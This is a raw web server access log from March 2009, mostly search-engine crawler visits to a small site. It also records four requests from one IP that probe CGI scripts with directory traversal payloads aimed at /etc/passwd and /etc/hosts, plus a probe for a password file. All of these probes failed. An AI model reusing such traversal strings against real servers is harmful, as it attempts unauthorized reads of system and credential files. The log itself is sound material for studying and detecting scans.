67.195.37.189 - - [31/Mar/2009:17:23:37 +0200] "GET /zampa/montenegro/ HTTP/1.0" 200 2651 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
85.66.137.215 - - [31/Mar/2009:17:32:46 +0200] "GET http://www.various-euro.com/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/passwd HTTP/1.0" 404 2748 "http://www.various-euro.com/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/passwd" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
85.66.137.215 - - [31/Mar/2009:17:32:46 +0200] "GET http://www.various-euro.com/cgi-bin/ad.cgi?file=../../../../../../../../etc/hosts HTTP/1.0" 404 2748 "http://www.various-euro.com/cgi-bin/ad.cgi?file=../../../../../../../../etc/hosts" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
85.66.137.215 - - [31/Mar/2009:17:32:46 +0200] "GET http://www.various-euro.com/cgi-bin/ssi//../../../../../../../../../etc/hosts HTTP/1.0" 400 1201 "http://www.various-euro.com/cgi-bin/ssi//../../../../../../../../../etc/hosts" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
85.66.137.215 - - [31/Mar/2009:17:32:46 +0200] "GET http://www.various-euro.com/cgi-bin/.htpasswrd.cgi HTTP/1.0" 404 2748 "http://www.various-euro.com/cgi-bin/.htpasswrd.cgi" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
66.249.71.249 - - [31/Mar/2009:17:34:22 +0200] "GET / HTTP/1.1" 200 7869 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
64.1.215.165 - - [31/Mar/2009:17:37:26 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
65.55.211.174 - - [31/Mar/2009:17:44:41 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.174 - - [31/Mar/2009:17:44:42 +0200] "GET /restate_copy.html HTTP/1.1" 200 97631 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.109.39 - - [31/Mar/2009:17:46:04 +0200] "GET /restate_copy.html HTTP/1.0" 200 97631 "http://search.live.com/results.aspx?q=restate" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
65.55.109.39 - - [31/Mar/2009:17:46:07 +0200] "GET /menueleiste.js HTTP/1.0" 404 2748 "http://www.various-euro.com/restate_copy.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
